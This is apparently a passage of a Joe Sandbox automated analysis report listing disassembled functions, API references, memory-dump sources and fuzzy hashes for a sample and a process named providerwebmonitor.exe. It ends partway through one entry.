Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID:
String ID: UNC$\\?\
API String ID: 0-253988292
Opcode ID: c7b66e1b6d6c661797f60c3a4311ba5d35138c3bc818f5bdeb8843524369c245
Instruction ID: e7f1ef7bad0c34c2b3e9d8ad62a572b108de914e632e62ad884760676d7c3ef0
Opcode Fuzzy Hash: c7b66e1b6d6c661797f60c3a4311ba5d35138c3bc818f5bdeb8843524369c245
Instruction Fuzzy Hash: 43417C3580021AAACF20AE21DC81FAB77E9EF85750B10C0E5F83CA7162E774DE41CE65

Function 00B88FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00B88FC4

Strings

Shell.Explorer, xrefs: 00B88FEF
about:blank, xrefs: 00B89082

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID:
String ID: Shell.Explorer$about:blank
API String ID: 0-874089819
Opcode ID: c03dadffc0b01139235c839eeeadd0aa50793495868f9d93608e2f15c53acc13
Instruction ID: ea11363d207d4c9593a23b197125ef55165d771d8ac28d8fe61cf04a4b525043
Opcode Fuzzy Hash: c03dadffc0b01139235c839eeeadd0aa50793495868f9d93608e2f15c53acc13
Instruction Fuzzy Hash: 232151712143049FDF18AF64C895A7A77E9FF89711B1885ADF9099B2A2DF70EC00CB60

Function 00B7EBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 00B7EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00B7EB92
Part of subcall function 00B7EB73: GetProcAddress.KERNEL32(00BB81C0,CryptUnprotectMemory), ref: 00B7EBA2

GetCurrentProcessId.KERNEL32(?,?,?,00B7EBEC), ref: 00B7EC84

Strings

CryptProtectMemory failed, xrefs: 00B7EC3B
CryptUnprotectMemory failed, xrefs: 00B7EC7C

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: c98170ad300a2ff6fc025e8ebd77f4e335c6c09233994926842bf35b6476da30
Instruction ID: 74a1160c5bd622eedd4329d1bdfbfe4358691a1563bb9093645b1f7a9bb7d0e5
Opcode Fuzzy Hash: c98170ad300a2ff6fc025e8ebd77f4e335c6c09233994926842bf35b6476da30
Instruction Fuzzy Hash: 95112432A056246BDB165B35DD06AAE3BD8EF09B10B04C1D5F8396F291CBB1DE418BD0

Function 00B80889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,00B809D0,?,00000000,00000000), ref: 00B808AD
SetThreadPriority.KERNEL32(?,00000000), ref: 00B808F4

Part of subcall function 00B76E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B76EAF

Strings

CreateThread failed, xrefs: 00B808B9

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: 146768c106cd38132db2cfe87be814ad1713411d9112e61751b63348e7dfc0b5
Instruction ID: 6617cf6228008081c9efdd86aa92af36cac8f99858f5996fe5ce7086018eb377
Opcode Fuzzy Hash: 146768c106cd38132db2cfe87be814ad1713411d9112e61751b63348e7dfc0b5
Instruction Fuzzy Hash: C101D6B23543066FE6207F54EC82BB673D8EB41751F1000AEF586621A0CEE1A885D764

Function 00B9B2AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B98FA5: GetLastError.KERNEL32(?,00BB0EE8,00B93E14,00BB0EE8,?,?,00B93713,00000050,?,00BB0EE8,00000200), ref: 00B98FA9
Part of subcall function 00B98FA5: _free.LIBCMT ref: 00B98FDC
Part of subcall function 00B98FA5: SetLastError.KERNEL32(00000000,?,00BB0EE8,00000200), ref: 00B9901D
Part of subcall function 00B98FA5: _abort.LIBCMT ref: 00B99023

_abort.LIBCMT ref: 00B9B2E0
_free.LIBCMT ref: 00B9B314

Strings

X ~, xrefs: 00B9B31A, 00B9B322

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: ErrorLast_abort_free
String ID: X ~
API String ID: 289325740-3218595459
Opcode ID: fa20b329d24651bdb5ff35b7a8b7093d641ee964fa408d3e9fa27a1e2f506a90
Instruction ID: 181b183f60e592fb6ccd7c0ac2b83073a5da7b63a5fe7ffc1320532f7dfa202d
Opcode Fuzzy Hash: fa20b329d24651bdb5ff35b7a8b7093d641ee964fa408d3e9fa27a1e2f506a90
Instruction Fuzzy Hash: 6901C032D156259BCF21EF58A902A1DB7E0FF05B21B1941BAE47067691CF30AD02CFDA

Function 00B7130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00B7DA98: _swprintf.LIBCMT ref: 00B7DABE
Part of subcall function 00B7DA98: _strlen.LIBCMT ref: 00B7DADF
Part of subcall function 00B7DA98: SetDlgItemTextW.USER32(?,00BAE154,?), ref: 00B7DB3F
Part of subcall function 00B7DA98: GetWindowRect.USER32(?,?), ref: 00B7DB79
Part of subcall function 00B7DA98: GetClientRect.USER32(?,?), ref: 00B7DB85

GetDlgItem.USER32(00000000,00003021), ref: 00B7134F
SetWindowTextW.USER32(00000000,00BA35B4), ref: 00B71365

Strings

0, xrefs: 00B7130E

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: e23c9bd5b7aba117e8dc45add081153bd95678f9b6e3788fd46db51ee2784ea0
Instruction ID: 0627f38cf574cfd3a7d495fffbe0dd1e91a8056ff6f27528b2aa15a9343dfa91
Opcode Fuzzy Hash: e23c9bd5b7aba117e8dc45add081153bd95678f9b6e3788fd46db51ee2784ea0
Instruction Fuzzy Hash: 36F0A930000288B6CF251F28C809BFA3BE8BB20B45F09C884BD6D518A0CB78C891EA34

Function 00B8084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00B80A78,?), ref: 00B80854
GetLastError.KERNEL32(?), ref: 00B80860

Part of subcall function 00B76E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B76EAF

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00B80869

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: 33fdafd7bbd85458cefc776b4ba6df7c25220bd8bfecfdd83b84e52c1c61f743
Instruction ID: 28ca13c1023561098ddbcb54c81caf645b0d3e99cc70703ba01fdcc2910198fb
Opcode Fuzzy Hash: 33fdafd7bbd85458cefc776b4ba6df7c25220bd8bfecfdd83b84e52c1c61f743
Instruction Fuzzy Hash: 38D01732A186212ACA213724AC0AABF7A859B53B70F204794F239661F5DF61099186A6

Function 00B7DA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00B7D32F,?), ref: 00B7DA53
FindResourceW.KERNEL32(00000000,RTL,00000005,?,00B7D32F,?), ref: 00B7DA61

Strings

RTL, xrefs: 00B7DA5B

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 45fd199879c14e0b2685e4a9417f7d24d5e7c4c75fe10dbbe74675b3c6aac202
Instruction ID: 635f8f033f69efdd55b1c93eccaebd606c260c0e4960fcf8de7792072061dc8b
Opcode Fuzzy Hash: 45fd199879c14e0b2685e4a9417f7d24d5e7c4c75fe10dbbe74675b3c6aac202
Instruction Fuzzy Hash: C3C01232289350B6EB3027306C0EB837AD8AB12F52F09048CB246DB1E0DAE5CA4087A0

Function 00B9B5C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 00B9B5C0
GetCommandLineW.KERNEL32 ref: 00B9B5CB

Strings

`%}, xrefs: 00B9B5C6

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: CommandLine
String ID: `%}
API String ID: 3253501508-1909575508
Opcode ID: 92e1ccbf023065e7d43949169d7817ce5520f667e154051d49417f5db34dbfe3
Instruction ID: 180b55742eeb0235c2a9ffd9a60a3f071b3de841405795534f61a98d107ab48d
Opcode Fuzzy Hash: 92e1ccbf023065e7d43949169d7817ce5520f667e154051d49417f5db34dbfe3
Instruction Fuzzy Hash: FBB00878902241ABC740DFB8B96E184BBE0F659A527845A56A415D3721EF3581459E10

Analysis Process: providerwebmonitor.exePID: 7112, Parent PID: 6940COMMON

Executed Functions

Function 00007FFD9B8BC85D Relevance: 1.5, Strings: 1, Instructions: 232COMMON

Download Yara Rule

Strings

_, xrefs: 00007FFD9B8BC939

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 6039bb6c7e53bc235f5f831f7ca2b83864d1f1eea390cbaa622f7728b8f8ac6f
Instruction ID: 299e48040f5fd99a5160aae01f7cdf49e9be05f8b594aa6f2217ca1df5d26e80
Opcode Fuzzy Hash: 6039bb6c7e53bc235f5f831f7ca2b83864d1f1eea390cbaa622f7728b8f8ac6f
Instruction Fuzzy Hash: E8611932B0952E4AFB29BBB8E8684FD77A0EF58325F05057BD01DC60E6DE2461458E90

Function 00007FFD9B8BC8BD Relevance: 1.4, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

_, xrefs: 00007FFD9B8BC939

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: cd2d3c9dace1c536518df58622f677c3f7d125a345c61486b6433b20c0b91b26
Instruction ID: 281aa1af12c116ef1ed002e0cb7dfd8cbcaa99ac367e658c1ec24849caf50689
Opcode Fuzzy Hash: cd2d3c9dace1c536518df58622f677c3f7d125a345c61486b6433b20c0b91b26
Instruction Fuzzy Hash: 3931D221B0E27F4BFB2A7BB8A8295FD7760EF45324B050577D059CA0E3DE2826418E95

Function 00007FFD9B8B605A Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

>, xrefs: 00007FFD9B8B607E

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID: >
API String ID: 0-325317158
Opcode ID: d3bc25e494bd97cd7e8ca1529884dde5c06ffa9322f4cefd8fc3b66e92acd777
Instruction ID: 6f3f09045fc8b827157cea041561d4118a7969385eb328c5ed4dab7831cb2674
Opcode Fuzzy Hash: d3bc25e494bd97cd7e8ca1529884dde5c06ffa9322f4cefd8fc3b66e92acd777
Instruction Fuzzy Hash: A0112E34A0596DCFDBA5DF64C894BA9B7B1FB48301F5045E6840DE3295DE34AB84CF50

Function 00007FFD9B8BAB45 Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ba8dc43a09d8f8860314c650871423d8729df329a8002725dbe2e414fe611a4
Instruction ID: a4aba2bcf4ecc0e49841ef7e330bed8c1abb9bb6f66d9cdb4765495ffe56f951
Opcode Fuzzy Hash: 6ba8dc43a09d8f8860314c650871423d8729df329a8002725dbe2e414fe611a4
Instruction Fuzzy Hash: 6AD12D70E1965DCFDB68EB98C4A4BBCB7B1FF19705F11017AD00DA72A2CA386981CB41

Function 00007FFD9B8B1718 Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8dbf3bd35db25b2ee24efd03218026abc61a5dda967d0ae9b98e5d50cc39b0a
Instruction ID: f59831fc92004b82fc45e2de1dbc0e41ea78665e8970d3be3112e599de5b1932
Opcode Fuzzy Hash: a8dbf3bd35db25b2ee24efd03218026abc61a5dda967d0ae9b98e5d50cc39b0a
Instruction Fuzzy Hash: 8D81E031B1DA594FDB58EF6C88615A977E2FF98300B14417AE45EC72A2DE34AD02CB81

Function 00007FFD9B8B1D8D Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e089ecbe5a8b986bca81175e9f8675538d188cfd9970d117aba6c99957ae5790
Instruction ID: 72a7445546e7c62465b412e4ce09217aaad4e25b56bc0d3c5c0ea0bebf1b2739
Opcode Fuzzy Hash: e089ecbe5a8b986bca81175e9f8675538d188cfd9970d117aba6c99957ae5790
Instruction Fuzzy Hash: E851F131B19A5D4FDB58DF5888605BA73E2FF98310B14467EE45ACB292DE34E802CB80

Function 00007FFD9B8B31E5 Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19bc1bc7701124922c446678cb400803339cca6b4a3d7b9a201f22b861c069c8
Instruction ID: 7211c6ae0d5187e24f8ae654d13ef7de89ea20ff67ac70ca365220709643a88b
Opcode Fuzzy Hash: 19bc1bc7701124922c446678cb400803339cca6b4a3d7b9a201f22b861c069c8
Instruction Fuzzy Hash: 6051FC71E0A52E8FEB64DFA4D4656EDBBF1EF58301F51017AD009E72A1DA386A44CF40

Function 00007FFD9B8BC73D Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a9872a753ca1072ad54c2a51447b7fc1f1de60e50670aceadd5b807baaf0b96
Instruction ID: 2106935e5e51da0b475f7e6134d115e0773cc3442eb4a8f952805495007d23f9
Opcode Fuzzy Hash: 1a9872a753ca1072ad54c2a51447b7fc1f1de60e50670aceadd5b807baaf0b96
Instruction Fuzzy Hash: 5D51ED70E1951D8EEBA4DBA4C4697EDB7B1FF98300F1146BAD00DE3291DE386A848F40

Function 00007FFD9B8B3615 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b0e91ae4c70d3b3e840b984255fa75aa53ebb29c1ff925e8ee6092cadb7863d
Instruction ID: 12affc7df5df0f64b8906b35215c678dfa36b8e6f05865775c23282d30d0649e
Opcode Fuzzy Hash: 1b0e91ae4c70d3b3e840b984255fa75aa53ebb29c1ff925e8ee6092cadb7863d
Instruction Fuzzy Hash: A5517E71A0995E8FEB98DB68D865BED7BE0FF59300F41017AD009D72A5DF346901CB81

Function 00007FFD9B8B21A5 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70f10243fff3cc87c24a7cd6205d3b8e861106859bb0bc789bdb2c7311a795ec
Instruction ID: 5130b05ab1a1af026b9b0e4c8f0eccb8c5938e339dd80ab610f2026b6a17c2f2
Opcode Fuzzy Hash: 70f10243fff3cc87c24a7cd6205d3b8e861106859bb0bc789bdb2c7311a795ec
Instruction Fuzzy Hash: CE418D31F0EA5E0FD766DBB898651B8BFE0EF4A300B0545FBD04CC71A6DE28A9018781

Function 00007FFD9B8BBCB9 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24a761a81ba4bba1c5cc06cf1e6cd9d2afb22ffb69c9d729a1c0deca5053a017
Instruction ID: da7b0d0c520ef69cfa500ced4bfe71e19dce1e25fbab61e5cae5754e03951fe9
Opcode Fuzzy Hash: 24a761a81ba4bba1c5cc06cf1e6cd9d2afb22ffb69c9d729a1c0deca5053a017
Instruction Fuzzy Hash: D0411970E0A66E9FDB64DFA4D8646ED7BB1FF18300F05057AD409E72A1DB78A9448F80

Function 00007FFD9B8BAE3D Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6842802584fa321f4220def57d01046e6d77a68f1fada72a8d9bd22ade3a8ba9
Instruction ID: 2088bd271fe52ef28e5f33db49db828b47ad38f92b7763309815bc40439b4117
Opcode Fuzzy Hash: 6842802584fa321f4220def57d01046e6d77a68f1fada72a8d9bd22ade3a8ba9
Instruction Fuzzy Hash: 5A31E271F1A92F6FE761ABB888695ED77E0FF59310F1144B6D01CC31A6EE34A5018A80

Function 00007FFD9B8B33F8 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a107e14c6c12e9bac0a9a8b1387e2a17e88849fff60b481a0ee19b5528b7ce66
Instruction ID: 8bd75c489d1e2a05f579a720af0e58461d5ab532bc7f2a8448e7c47122d22d3b
Opcode Fuzzy Hash: a107e14c6c12e9bac0a9a8b1387e2a17e88849fff60b481a0ee19b5528b7ce66
Instruction Fuzzy Hash: 2931CE3094E7994FD743ABB488685A97FF4EF1B310B0A04FBD448CB0B2DA289545CB61

Function 00007FFD9B8BC397 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1060f92b9e5b1fe411cc961d70cd405e3505a27900e06cdf0d29c938cf53148
Instruction ID: c50d5b170fcb4dd90922aa81619216f6c2b401954a6359aa31189c7a5ecd4323
Opcode Fuzzy Hash: b1060f92b9e5b1fe411cc961d70cd405e3505a27900e06cdf0d29c938cf53148
Instruction Fuzzy Hash: EC21D83188E2DA4FD7175B705C3A5F63FB4AF07214F0901E7E498C64A3D62C1255C762

Function 00007FFD9B8BC254 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49bcc80b03dbb99e359cb418599ec2df737e12e35221cb24f8e789a3ee167d15
Instruction ID: e3bb445d47cd36c5d5e6e330e8950255b7a9da81b0168813c6e46c8defa8e05a
Opcode Fuzzy Hash: 49bcc80b03dbb99e359cb418599ec2df737e12e35221cb24f8e789a3ee167d15
Instruction Fuzzy Hash: 2C21E774E1D92D9EEBA4EBE8D8656ACB7B1FF5D300F511029D00DE32A2CE2469418F84

Function 00007FFD9B8B3591 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c982c9c7a96ce5b62878df0634423eedd2213543f0512c82911d1ca023b9eff
Instruction ID: f75aafedaa5a068311eb42d5ee9a6caedfb6c289e5ece71838a2f6bdf0781436
